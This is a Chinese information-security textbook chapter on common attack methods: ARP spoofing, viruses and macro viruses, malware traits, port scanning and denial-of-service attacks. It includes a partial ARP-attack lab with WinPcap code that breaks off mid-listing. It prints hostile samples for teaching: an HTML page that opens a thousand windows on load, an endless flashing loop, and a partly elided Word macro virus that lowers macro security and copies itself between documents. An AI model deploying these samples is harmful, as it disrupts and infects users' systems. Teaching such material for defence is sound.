《信息安全導(dǎo)論》課件1第4章

第4章常見攻擊方法4.1攻擊方法概述

4.2病毒與惡意軟件4.3掃描攻擊4.4拒絕服務(wù)攻擊

思考題

實(shí)驗(yàn)4用WinpcapAPI實(shí)現(xiàn)ARP攻擊

4.1攻擊方法概述“知己知彼，百戰(zhàn)不殆”。研究信息安全不研究信息攻擊方法就是紙上談兵。信息攻擊的方法有很多。一般教科書上把信息攻擊分為主動(dòng)攻擊和被動(dòng)攻擊兩大類，我們這里把信息攻擊分為信息的偵察與竊取、信息欺騙和信息封鎖與破壞三個(gè)大類。攻擊者試圖通過使用其中一種或多種方法達(dá)到攻擊目的。電話竊聽、電子信息偵察、特洛伊木馬、掃描、網(wǎng)絡(luò)嗅探等是信息偵察與竊取的常用方法。其中，網(wǎng)絡(luò)嗅探器是一種能自動(dòng)捕獲網(wǎng)絡(luò)中傳輸報(bào)文的設(shè)備，一般設(shè)置在網(wǎng)絡(luò)接口位置。有些嗅探器能夠分析幾百種協(xié)議，捕獲網(wǎng)上傳輸?shù)目诹?、機(jī)密文件與專用信息，還可以獲取高級(jí)別的訪問權(quán)限。

計(jì)算機(jī)網(wǎng)絡(luò)竊密具有隱蔽性好、渠道眾多、難以防范、效果顯著、威脅性大等特點(diǎn)，正越來越引起人們的關(guān)注。計(jì)算機(jī)竊取技術(shù)主要有截取計(jì)算機(jī)電磁和聲泄露、通過計(jì)算機(jī)和存儲(chǔ)介質(zhì)竊密、通過刺探竊取口令或繞過訪問控制機(jī)制非法進(jìn)入計(jì)算機(jī)系統(tǒng)竊密、利用技術(shù)壟斷在系統(tǒng)或軟件中安裝木馬竊密、利用網(wǎng)絡(luò)協(xié)議和操作系統(tǒng)漏洞竊密等。通信內(nèi)容欺騙、IP地址欺騙、新聞媒體欺騙、雷達(dá)欺騙、社會(huì)工程學(xué)攻擊等是常見的信息欺騙方法。其中社會(huì)學(xué)攻擊是利用人們的心理特征騙取信任并進(jìn)而實(shí)施攻擊的一種方法。這種方法目前正呈上升和泛濫趨勢(shì)。據(jù)軍事心理學(xué)家的分析和測(cè)試證明，當(dāng)一個(gè)人同時(shí)對(duì)一個(gè)事物接到兩種內(nèi)容完全相反的正、誤信息時(shí)，其得出正確結(jié)論的概率只有50%，最高不超過65%；當(dāng)再次接到錯(cuò)誤信息時(shí)，其判斷出錯(cuò)的概率又增加15%；當(dāng)其始終接受某一錯(cuò)誤信息導(dǎo)向時(shí)，即使訓(xùn)練有素的人，也難以得出正確的結(jié)論。信息封鎖與破壞是指通過一定的手段使敵方無法獲取和利用信息，如拒絕服務(wù)攻擊、計(jì)算機(jī)病毒、電子干擾、電磁脈沖、高能微波、高能粒子束和激光等。

例4-1ARP欺騙攻擊。

IP數(shù)據(jù)包放入幀中傳輸時(shí)，必須要填寫幀中的目的物理地址。通常用戶只指定目的IP地址，計(jì)算機(jī)自動(dòng)完成IP地址到物理地址的轉(zhuǎn)換。地址解析協(xié)議(AddressResolutionProtocol，ARP)利用目的IP地址，與子網(wǎng)內(nèi)其他計(jì)算機(jī)交換信息，完成IP地址到物理地址的轉(zhuǎn)換。源主機(jī)在發(fā)出ARP請(qǐng)求并接收到ARP應(yīng)答后，將目的主機(jī)的IP地址與物理地址映射關(guān)系存入自己的高速緩沖區(qū)。目的主機(jī)接收到ARP請(qǐng)求后將源主機(jī)的IP地址與物理地址映射關(guān)系存入自己的高速緩沖區(qū)。讀者可以通過“arp-a”命令在DOS狀態(tài)下查看本機(jī)最近獲得的arp表項(xiàng)。ARP請(qǐng)求是廣播發(fā)送的，網(wǎng)絡(luò)中的所有主機(jī)接收到ARP請(qǐng)求后都可以將源主機(jī)的IP地址與物理地址映射關(guān)系存入自己的高速緩沖區(qū)。在高速緩沖區(qū)中，新表項(xiàng)加入時(shí)定時(shí)器開始計(jì)時(shí)。表項(xiàng)添加后2分鐘內(nèi)沒有被再次使用即被刪除。表項(xiàng)被再次使用時(shí)會(huì)增加2分鐘的生命周期，但最長(zhǎng)不超過10分鐘。

ARP協(xié)議的原理如圖4-1、4-2所示。圖4-1ARP原理(一)圖4-2ARP原理(二)

ARP欺騙攻擊分為二種，一種是對(duì)路由器ARP表的欺騙；另一種是對(duì)內(nèi)網(wǎng)PC的網(wǎng)關(guān)欺騙。第一種ARP欺騙的原理是，設(shè)法通知路由器一系列錯(cuò)誤的內(nèi)網(wǎng)MAC地址，并按照一定的頻率不斷進(jìn)行，使真實(shí)的地址信息無法通過更新保存在路由器中，導(dǎo)致路由器的所有數(shù)據(jù)只能發(fā)送給錯(cuò)誤的MAC地址，造成正常PC無法收到信息。第二種ARP欺騙的原理是偽造網(wǎng)關(guān)，讓被它欺騙的PC向假網(wǎng)關(guān)發(fā)數(shù)據(jù)，而不是通過正常的路由器途徑上網(wǎng)。圖4-3為結(jié)合上述兩種欺騙原理的所謂ARP雙向欺騙示意圖。圖4-3ARP雙向欺騙示意圖4.2病毒與惡意軟件4.2.1病毒根據(jù)《中華人民共和國(guó)計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例》，病毒的明確定義是“指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者破壞數(shù)據(jù)，影響計(jì)算機(jī)使用并且能夠自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼”。

病毒既可以感染桌面計(jì)算機(jī)也可以感染網(wǎng)絡(luò)服務(wù)器，往往還具有一定的潛伏性、特定的觸發(fā)性和很大的破壞性。一些病毒被設(shè)計(jì)為通過損壞程序、刪除文件或重新格式化硬盤來損壞計(jì)算機(jī)。有些病毒不損壞計(jì)算機(jī)，而只是復(fù)制自身，并通過顯式形式表明它們的存在。根據(jù)其性質(zhì)、功能和所造成的危害，計(jì)算機(jī)病毒大致可分為定時(shí)炸彈型、暗殺型、強(qiáng)制隔離型、超載型、間諜型和矯令型。病毒一般分成主控模塊、傳染模塊、破壞模塊和觸發(fā)模塊4個(gè)部分，結(jié)構(gòu)框架可表示如下：病毒程序{感染模塊:

{循環(huán):隨機(jī)搜索一個(gè)文件;如果感染條件滿足則將病毒體寫入該文件;否則跳到循環(huán)處運(yùn)行;}破壞模塊:

{執(zhí)行病毒的破壞代碼}觸發(fā)模塊:

{如果觸發(fā)條件滿足返回真;否則返回假;}主控模塊:

{執(zhí)行傳染模塊;執(zhí)行觸發(fā)模塊如果返回為真,執(zhí)行破壞模塊;執(zhí)行原程序;}}病毒的傳染模塊主要完成病毒的自我復(fù)制。傳染的一般過程是:當(dāng)病毒程序或染毒的程序運(yùn)行時(shí)，病毒截取控制權(quán)，尋求感染突破口，當(dāng)傳染條件滿足，即將病毒代碼自制到宿主程序。病毒的傳染條件根據(jù)不同的傳染方式有不同的類型。例如，常駐內(nèi)存病毒一般修改系統(tǒng)中斷并插入病毒中斷程序。如果其他程序訪問被病毒掛接中斷，則即會(huì)被傳染。腳本病毒是計(jì)算機(jī)病毒的一種形式，主要采用腳本語言編寫，它可以對(duì)系統(tǒng)進(jìn)行操作，包括創(chuàng)建、修改、刪除，甚至格式化硬盤，具有傳播速度快，危害性大等特點(diǎn)。腳本病毒的書寫形式靈活，容易產(chǎn)生變種，這就使得傳統(tǒng)的特征提取方式對(duì)變種腳本病毒檢測(cè)率很低，對(duì)未知的腳本病毒甚至無法識(shí)別。微軟提供了一種基于32位Windows平臺(tái)的、與語言無關(guān)的腳本解釋機(jī)制WSH。它使得腳本能直接在Windows桌面或命令提示符下運(yùn)行。瀏覽器也依賴于WSH提供的VBScript和JAVAScript腳本引擎，解釋網(wǎng)頁中嵌入的腳本代碼。例4-2下面的代碼是一個(gè)邏輯炸彈，請(qǐng)讀者閱讀該代碼并以hellow1.htm存盤,然后雙擊該文件，察看并分析運(yùn)行結(jié)果。

<html>

<head>

<title>no</title>

<scriptlanguage="JavaScript">;

functionopenwindow(){

for(i=0;i<1000;i++)

window.open('');}

</script>

</head>

<bodyonload="openwindow()">

</body>

</html>

例4-3下面一段代碼利用死循環(huán)原理，交叉顯示紅色和黑色，造成刺眼效果。請(qǐng)讀者閱讀下列代碼并以hellow.htm存盤，雙擊該文件，察看并分析運(yùn)行結(jié)果

<html>

<body>

test

<script>

varcolor=newArray;

color[1]="black";

color[2]="red";

for(x=2;x<3;x++)

{

document.bgColor=color[x];

if(x==2){x=0;}

}

</script>

</body>

</html>宏(macro)是微軟為其office軟件設(shè)計(jì)的一種特殊功能，其目的是為了在使用該軟件時(shí)避免重復(fù)相同的工作。而宏病毒是一種特殊的宏，它通過使用應(yīng)用程序的宏語言(如VRA)生成與文檔相聯(lián)系的病毒。編制者通過修改Word的命令、使用Document對(duì)象的事件、利用Word啟動(dòng)時(shí)自動(dòng)加載normal.doc模板和它所包含宏的特點(diǎn)修改normal.doc中的自動(dòng)宏等方法來進(jìn)行激發(fā)。例4-4Word宏病毒示例。所有Word文檔和模板都有Document對(duì)象。Document對(duì)象支持Close、New和Open三種事件。如果在代碼模塊中存在響應(yīng)這些事件的過程，則當(dāng)執(zhí)行關(guān)閉文檔、建立新文檔或打開文檔的操作時(shí)，相應(yīng)文檔事件過程就會(huì)被執(zhí)行。下面是以Document對(duì)象的事件作為激發(fā)機(jī)制的宏病毒樣本，請(qǐng)讀者分析其大體結(jié)構(gòu)。

PrivateSubdocument_open()’定義Document對(duì)象的Open事件

Dim…’定義事件中所用的各種變量(略)

OnErrorResumeNext’若有錯(cuò)誤，繼續(xù)執(zhí)行以下語句

OptionsVirusProteetion=False’將宏安全等級(jí)設(shè)置為低，本語句在Word2000中無效

IfMonth(Now)=5Andday(Now)=12Then

…’以5月12日為病毒發(fā)作觸發(fā)條件(宏病毒表現(xiàn)代碼段略)

ElseSetobjActiveDocument=ActiveDocument.VBProject.VBComponents．Item(''thisdocument")．CodeModuleSetobjNormal=NormalTemplate.VBProject.VBComponents．

Item(''Thisdocument")．CodeModule’查找活動(dòng)文檔和Normal公共模板的Thisdocument類模塊中是否有字符串“abed”。此處“abed”是病毒感染標(biāo)志，說明文檔或模板是否已經(jīng)感染了該病毒blnobjActive=objActiveDocument．Find(“abed”，1，1，10000．10000)blnobjNormal=objNormal．Find(''abed”．1，1，10000，10000)’若活動(dòng)文檔已有該宏病毒，而Normal公共模板中沒有，則將Normal公共模板的Thisdocument類模塊中的代碼全部刪除后．將活動(dòng)文檔中的宏病毒體復(fù)制到Normal公共模板中，并保存Normal公共模板IfblnobjActive=TrueAndblnobjNormal=FalseThenObjNorma1．deletelines1，objNormal．countoflinesbdl=objActiveDocumentlines(1，objActiveDocumen．countoflines)objNormal．a(chǎn)ddfromstringbdtNormalTemplate．SaveEndIf’若Normal公共模板已有該宏病毒，而活動(dòng)文檔中役有，則將活動(dòng)文檔的Thlsdocument類模塊中的代碼全部刪除后，將Normal公共模板中的宏病毒體復(fù)制到活動(dòng)文檔中，并保存活動(dòng)文檔IfblnobjNormal=TrueAndblnobjActive=FalseThenobjActiveDoceumeot．deletelines1，objActiveDocument．countoflinesbdI=objNormal.lines(1，objNormal．Countoflines)objActiveDocument.addfromstringbdtActiveDocument.SaveEndIfEndIfEndSub宏病毒的破壞作用可造成文檔不能正常打印、將文件改名、改變文件存儲(chǔ)路徑、重復(fù)復(fù)制文件、封閉有關(guān)菜單等。宏病毒還能夠調(diào)用系統(tǒng)命令，進(jìn)而破壞整個(gè)信息處理系統(tǒng)。由于宏病毒依附于Word文檔，隱蔽性較強(qiáng)，這給其通過電子郵件附件傳播帶來了方便。更新的電子郵件病毒則只要打開郵件便能感染所有郵件地址。蠕蟲是一種通過網(wǎng)絡(luò)傳播的惡性病毒，它具有病毒的一些共性，同時(shí)具有自己的一些特征，如蠕蟲不使用駐留文件即可在系統(tǒng)之間進(jìn)行自我復(fù)制，傳染目標(biāo)是互聯(lián)網(wǎng)內(nèi)的所有計(jì)算機(jī)，等等。典型的蠕蟲病毒有尼姆達(dá)、震蕩波等。特洛伊木馬是一種隱蔽植入對(duì)方計(jì)算機(jī)系統(tǒng)中的病毒。它可以根據(jù)程序設(shè)計(jì)者的設(shè)定，在被植入用戶未知的情況下，將被攻擊者的機(jī)器中的信息源源不斷地竊取出來?！皞髌婺抉R”和“QQ木馬”能夠竊取用戶的游戲賬號(hào)和密碼?！盎银澴印焙汀暗萝健本哂泻箝T功能。當(dāng)前我國(guó)網(wǎng)絡(luò)流行病毒的本土化趨勢(shì)更加明顯，很多病毒主要是針對(duì)國(guó)內(nèi)一些應(yīng)用程序?qū)ｉT制作的。

目前，病毒的發(fā)展呈現(xiàn)如下六大特征：

(1)經(jīng)濟(jì)利益驅(qū)使計(jì)算機(jī)病毒技術(shù)不斷突破。Rootkit隱藏技術(shù)以及對(duì)抗殺毒軟件技術(shù)被廣泛應(yīng)用。

(2)微軟“Oday”漏洞頻繁爆出。

(3)網(wǎng)銀病毒迅猛增長(zhǎng)。如今更多的病毒、蠕蟲和木馬程序是以計(jì)算機(jī)緩存里的用戶個(gè)人信息為目標(biāo)，試圖竊取用戶信用卡號(hào)碼、銀行密碼等，這被稱為“認(rèn)證盜竊”。

(4)病毒傳播呈現(xiàn)新特征，鎖定目標(biāo)定向傳播。

(5)病毒變種快、更新快、存活能力強(qiáng)。

(6)智能手機(jī)成病毒的下一個(gè)攻擊目標(biāo)。為了加強(qiáng)反病毒工作，我國(guó)先后成立了反病毒政府機(jī)構(gòu)和行業(yè)協(xié)會(huì)，這些機(jī)構(gòu)主要有公安部公共信息網(wǎng)絡(luò)安全監(jiān)察局、國(guó)家計(jì)算機(jī)病毒應(yīng)急處理中心、國(guó)家反計(jì)算機(jī)入侵和防病毒研究中心、各省(自治區(qū)/直轄市)公安廳(局)公共信息網(wǎng)絡(luò)安全監(jiān)察處和各地信息網(wǎng)絡(luò)安全協(xié)會(huì)。4.2.2惡意軟件惡意軟件是指在未明確提示用戶或未經(jīng)用戶許可的情況下，在用戶計(jì)算機(jī)或其他終端上安裝運(yùn)行，侵害用戶合法權(quán)益的軟件，但不包含我國(guó)法律法規(guī)規(guī)定的計(jì)算機(jī)病毒。具有下列特征之一的軟件可以被認(rèn)為是惡意軟件：

(1)強(qiáng)制安裝：指未明確提示用戶或未經(jīng)用戶許可，在用戶計(jì)算機(jī)或其他終端上安裝軟件的行為。

(2)難以卸載：指未提供通用的卸載方式，或在不受其他軟件影響、人為破壞的情況下，卸載后仍然有活動(dòng)程序的行為。

(3)瀏覽器劫持：指未經(jīng)用戶許可，修改用戶瀏覽器或其他相關(guān)設(shè)置，迫使用戶訪問特定網(wǎng)站或?qū)е掠脩魺o法正常上網(wǎng)的行為。

(4)廣告彈出：指未明確提示用戶或未經(jīng)用戶許可，利用安裝在用戶計(jì)算機(jī)或其他終端上的軟件彈出廣告的行為。

(5)惡意收集用戶信息：指未明確提示用戶或未經(jīng)用戶許可，惡意收集用戶信息的行為。

(6)惡意卸載：指未明確提示用戶、未經(jīng)用戶許可，或誤導(dǎo)、欺騙用戶卸載其他軟件的行為。

(7)惡意捆綁：指在軟件中捆綁已被認(rèn)定為惡意軟件的行為。

(8)其他侵害用戶軟件安裝、使用和卸載知情權(quán)、選擇權(quán)的惡意行為。我國(guó)目前還缺乏打擊惡意軟件的法律法規(guī)，沒有在法庭上被作為判定惡意軟件的依據(jù)?！罢l有資格來定義惡意軟件”是各界爭(zhēng)論最為激烈的問題。2006年的反惡意軟件運(yùn)動(dòng)中，包括奇虎公司在內(nèi)，幾個(gè)反惡意軟件的訴訟相繼失利，其焦點(diǎn)，就在于誰有資格判定惡意軟件。此外，反流氓軟件聯(lián)盟在各地發(fā)起對(duì)惡意軟件的訴訟，也因法律缺位、證據(jù)不足而失敗。法律法規(guī)滯后等原因直接束縛了反惡意軟件行業(yè)的發(fā)展。

病毒和惡意代碼的編制技術(shù)和技巧日益提高，使得它們往往具有良好的隱蔽性和生存性。其隱藏技術(shù)通常有文件隱藏、進(jìn)程隱藏、編譯器隱藏、隱蔽通道隱藏、加密隱藏等；生存技術(shù)通常有三線程監(jiān)視技術(shù)、反跟蹤技術(shù)、模糊變換技術(shù)、自動(dòng)生產(chǎn)技術(shù)、加密技術(shù)等。另外，蠕蟲、病毒、木馬和惡意代碼的攻擊也日益呈融合化趨勢(shì)，如圖4-4所示。這給相關(guān)的防范工作帶來了一定難度。病毒和惡意代碼攻擊為互聯(lián)網(wǎng)發(fā)展帶來了巨大挑戰(zhàn)。圖4-4一個(gè)以郵件附件形式傳播的假冒機(jī)票的惡意代碼4.3掃描攻擊掃描攻擊的主要目的是通過向遠(yuǎn)程或本地主機(jī)發(fā)送探測(cè)數(shù)據(jù)包，并根據(jù)反饋情況來判斷目的主機(jī)是否處于活動(dòng)狀態(tài)、使用的操作系統(tǒng)版本、開放的服務(wù)端口并進(jìn)而判斷是否存在漏洞等安全問題。漏洞是指系統(tǒng)安全過程、管理控制及內(nèi)部控制等存在的缺陷。常見的安全漏洞主要有網(wǎng)絡(luò)協(xié)議的安全漏洞、操作系統(tǒng)的安全漏洞和應(yīng)用程序的安全漏洞。漏洞只有被攻擊者利用才成為對(duì)系統(tǒng)的破壞條件。常見的掃描器軟件主要有nmap、santan、strobe、Pinger、PortScan、Superscan等，其中nmap是由Fyodor用C語言編寫的比較優(yōu)秀的源碼開放軟件。這些軟件往往是根據(jù)下列原理設(shè)計(jì)的：

(1)向目標(biāo)主機(jī)發(fā)送一個(gè)ICMPECHO(Type8)數(shù)據(jù)包，如果接收到反饋的ICMPECHOReply(ICMPType0)數(shù)據(jù)包，說明主機(jī)是存活狀態(tài)。如果沒有ECHOReply返回就可以初步判斷主機(jī)沒有在線或者使用了某些過濾設(shè)備過濾了ICMP的Reply消息。

(2)向目標(biāo)主機(jī)發(fā)送包頭錯(cuò)誤的IP包，目標(biāo)主機(jī)或過濾設(shè)備會(huì)反饋ICMPParameterProblemError信息。常見的偽造錯(cuò)誤字段為HeaderLength和IPOptions。

(3)向目標(biāo)主機(jī)發(fā)送的IP包中填充錯(cuò)誤的字段值，目標(biāo)主機(jī)或過濾設(shè)備會(huì)反饋ICMPDestinationUnreachable信息。

(4)向目的端口發(fā)送一個(gè)SYN分組。如果收到一個(gè)來自目標(biāo)端口的SYN/ACK分組，那么可以推斷該端口處于監(jiān)聽狀態(tài)。如果收到一個(gè)RST/ACK分組，那么它通常說明該端口不在監(jiān)聽。執(zhí)行端口的系統(tǒng)隨后發(fā)送一個(gè)RST/ACK分組，這樣并未建立一個(gè)完整的連接。這種技巧的優(yōu)勢(shì)比完整的TCP連接隱蔽，目標(biāo)系統(tǒng)的日志中一般不記錄未完成的TCP連接。向目標(biāo)主機(jī)特定端口發(fā)送一個(gè)0字節(jié)數(shù)據(jù)的UDP包，關(guān)閉端口會(huì)反饋ICMPPortUnreachable錯(cuò)誤報(bào)文，而開放的端口則沒有任何反饋。通過多個(gè)端口的掃描，還可以探測(cè)到目標(biāo)系統(tǒng)。大家熟悉的ping工具就是利用上述第一條原理設(shè)計(jì)的。該程序運(yùn)行時(shí)每秒發(fā)送一個(gè)包，顯示響應(yīng)的輸出，計(jì)算網(wǎng)絡(luò)來回的時(shí)間，最后顯示統(tǒng)計(jì)結(jié)果——丟包率。例如，使用工具軟件PortScan可以得到對(duì)方計(jì)算機(jī)都開放了哪些端口，如圖4-5所示。圖4-5PortScan運(yùn)行界面4.4拒絕服務(wù)攻擊拒絕服務(wù)攻擊(DenialofService，簡(jiǎn)稱DoS)的主要目的是使被攻擊的網(wǎng)絡(luò)或服務(wù)器不能提供正常的服務(wù)。有很多方式可以實(shí)現(xiàn)這種攻擊，最簡(jiǎn)單的方法是切斷網(wǎng)絡(luò)電纜或摧毀服務(wù)器；當(dāng)然利用網(wǎng)絡(luò)協(xié)議的漏洞或應(yīng)用程序的漏洞也可以達(dá)到同樣的效果。拒絕服務(wù)攻擊的攻擊方式有很多種。最基本的DoS攻擊就是利用合理的服務(wù)請(qǐng)求來占用過多的服務(wù)資源，致使服務(wù)超載，無法響應(yīng)其他的請(qǐng)求。這些服務(wù)資源包括網(wǎng)絡(luò)帶寬，文件系統(tǒng)空間容量，開放的進(jìn)程或者向內(nèi)的連接。這種攻擊會(huì)導(dǎo)致資源的匱乏，無論計(jì)算機(jī)的處理速度多么快，內(nèi)存容量多么大，互連網(wǎng)的速度多么快都無法避免這種攻擊帶來的后果。因?yàn)槿魏问露加幸粋€(gè)極限，所以，總能找到一個(gè)方法使請(qǐng)求的值大于該極限值，因此就會(huì)使所提供的服務(wù)資源匱乏，無法滿足需求。

SYN是TCP/IP協(xié)議建立連接時(shí)使用的握手信號(hào)。在客戶機(jī)和服務(wù)器之間建立正常的TCP網(wǎng)絡(luò)連接時(shí)，客戶機(jī)首先發(fā)出一個(gè)SYN消息，服務(wù)器使用SYN-ACK應(yīng)答表示接收到了這個(gè)消息，最后客戶機(jī)再以ACK消息響應(yīng)。這樣在客戶機(jī)和服務(wù)器之間才能建立起可靠的TCP連接，數(shù)據(jù)才可以在客戶機(jī)和服務(wù)器之間傳遞。

SYNFlood攻擊向一臺(tái)服務(wù)器發(fā)送許多SYN消息，該消息中攜帶的源地址根本不可用，當(dāng)服務(wù)器嘗試為每個(gè)請(qǐng)求消息分配連接來應(yīng)答這些SYN請(qǐng)求時(shí)，服務(wù)器就沒有其他資源來處理真正用戶的合法SYN請(qǐng)求了。這就造成了服務(wù)器不能正常提供服務(wù)。

Land攻擊和其他拒絕服務(wù)攻擊相似，也是通過利用某些操作系統(tǒng)在TCP/IP協(xié)議實(shí)現(xiàn)方式上的漏洞來破壞主機(jī)。在Land攻擊中，一個(gè)精心制造的SYN數(shù)據(jù)包中的源地址和目標(biāo)地址都被設(shè)置成某一個(gè)服務(wù)器地址，這將導(dǎo)致接收到這個(gè)數(shù)據(jù)包的服務(wù)器向它自己發(fā)送SYN-ACK消息，結(jié)果又返回ACK消息并創(chuàng)建一個(gè)空連接，每個(gè)這樣的連接都將一直保持到超時(shí)。

Smurf攻擊是以最初發(fā)動(dòng)這種攻擊的程序名Smurf來命名。這種攻擊方法結(jié)合使用了IP欺騙和ICMP回復(fù)方法使大量數(shù)據(jù)充斥目標(biāo)系統(tǒng)，引起目標(biāo)系統(tǒng)不能為正常系統(tǒng)進(jìn)行服務(wù)。簡(jiǎn)單的Smurf攻擊將ICMP應(yīng)答請(qǐng)求(ping)數(shù)據(jù)包的回復(fù)地址設(shè)置成受害網(wǎng)絡(luò)的廣播地址，最終導(dǎo)致該網(wǎng)絡(luò)的所有主機(jī)都對(duì)此ICMP應(yīng)答請(qǐng)求作出答復(fù)，從而導(dǎo)致網(wǎng)絡(luò)阻塞。因此它比pingofdeath攻擊的流量高出一到兩個(gè)數(shù)量級(jí)。復(fù)雜的Smurf攻擊將源地址改為第三方的受害者，最終導(dǎo)致第三方崩潰。

pingofDeath攻擊是利用網(wǎng)絡(luò)操作系統(tǒng)(包括UNIX的許多變種、Windows和MacOS等)的缺陷，當(dāng)主機(jī)接收到一個(gè)大的不合法的ICMP回應(yīng)請(qǐng)求包(大于64KB)時(shí)，會(huì)引起主機(jī)掛起或崩潰。分布式拒絕服務(wù)攻擊能將多個(gè)計(jì)算機(jī)聯(lián)合起來作為攻擊平臺(tái)，對(duì)一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng)DoS攻擊，從而成倍地提高拒絕服務(wù)攻擊的威力。

思考題

(1)請(qǐng)列舉敵手常用的攻擊方法。

(2)什么是病毒，如何防范腳本病毒和Word宏病毒？

(3)你的計(jì)算機(jī)系統(tǒng)是否存在漏洞，依據(jù)是什么？

(4)查找并閱讀Ping程序源代碼。

(5)列出拒絕服務(wù)攻擊的常見形式，說明如何應(yīng)對(duì)相關(guān)拒絕服務(wù)攻擊？

(6)什么是流量分析，如何對(duì)付流量分析？實(shí)驗(yàn)4用WinpcapAPI實(shí)現(xiàn)ARP攻擊

一、實(shí)驗(yàn)?zāi)康?/p>

(1)掌握Winpcap軟件包的使用方法。

(2)理解ARP雙向欺騙的原理，編程實(shí)現(xiàn)ARP攻擊。

(3)防ARP攻擊的方法。二、實(shí)驗(yàn)準(zhǔn)備

1.從/上下載Winpcap安裝包及開發(fā)包。

2.配置VC6.0環(huán)境。

(1)打開VC6.0，在[工具]->[選項(xiàng)]->[目錄]命令的Includefiles里面加入下載的Winpcap開發(fā)包解壓以后的include文件夾，在[工具]->[選項(xiàng)]->[目錄]命令的Libraryfiles里面加入下載的Winpcap開發(fā)包解壓以后的lib文件夾。

(2)用VC打開項(xiàng)目，然后在[工程]->[設(shè)置](Alt+F7)標(biāo)簽欄中選擇“C/C++”選項(xiàng)，在“預(yù)處理程序定義”的輸入框里添加“WPCAP”，再選擇“連接”，在“對(duì)象/庫模塊”輸入框里添加“wpcap.libPacket.lib”。

3．ARP攻擊的實(shí)現(xiàn)原理參見教材有關(guān)內(nèi)容。請(qǐng)查閱有關(guān)資料，了解預(yù)防ARP攻擊的方法。三、實(shí)驗(yàn)內(nèi)容

(1)下面程序的主要任務(wù)是用pcap_findalldevs()函數(shù)獲得本地的網(wǎng)卡列表，分析并調(diào)試運(yùn)行該程序，記錄運(yùn)行結(jié)果。

#include"pcap.h"

main()

{

pcap_if_t*alldevs;

pcap_if_t*d;

inti=0;

charerrbuf[PCAP_ERRBUF_SIZE];

/*這個(gè)API用來獲得網(wǎng)卡的列表*/if(pcap_findalldevs(&alldevs,errbuf)==-1){fprintf(stderr,"Errorinpcap_findalldevs:%s\n",errbuf);exit(1);}/*顯示列表的響應(yīng)字段的內(nèi)容*/for(d=alldevs;d;d=d->next){printf("%d.%s",++i,d->name);if(d->description)printf("(%s)\n",d->description);elseprintf("(Nodescriptionavailable)\n");}if(i==0){printf("\nNointerfacesfound!MakesureWinPcapisinstalled.\n");return;}/*不再使用這個(gè)設(shè)備，釋放資源*/pcap_freealldevs(alldevs);}

(2)下面程序的任務(wù)是打開適配器并捕獲數(shù)據(jù)包，分析并調(diào)試、運(yùn)行該程序，記錄運(yùn)行結(jié)果。

#include"pcap.h"

/*packethandler函數(shù)原型*/

voidpacket_handler(u_char*param,conststruct

pcap_pkthdr*header,constu_char*pkt_data);

main()

{pcap_if_t*alldevs;pcap_if_t*d;intinum;inti=0;pcap_t*adhandle;charerrbuf[PCAP_ERRBUF_SIZE];/*獲取本機(jī)設(shè)備列表*/if(pcap_findalldevs_ex(PCAP_SRC_IF_STRING,NULL,&alldevs,errbuf)==-1){fprintf(stderr,"Errorinpcap_findalldevs:%s\n",errbuf);exit(1);/*打印列表*/for(d=alldevs;d;d=d->next){printf("%d.%s",++i,d->name);if(d->description)printf("(%s)\n",d->description);elseprintf("(Nodescriptionavailable)\n");}if(i==0){printf("\nNointerfacesfound!MakesureWinpcapisinstalled.\n");return-1;}printf("Entertheinterfacenumber(1-%d):",i);scanf("%d",&inum);if(inum<1||inum>i){printf("\nInterfacenumberoutofrange.\n");/*釋放設(shè)備列表*/pcap_freealldevs(alldevs);return-1;}/*跳轉(zhuǎn)到選中的適配器*/for(d=alldevs,i=0;i<inum-1;d=d->next,i++);/*打開設(shè)備*/if((adhandle=pcap_open(d->name, //設(shè)備名

65536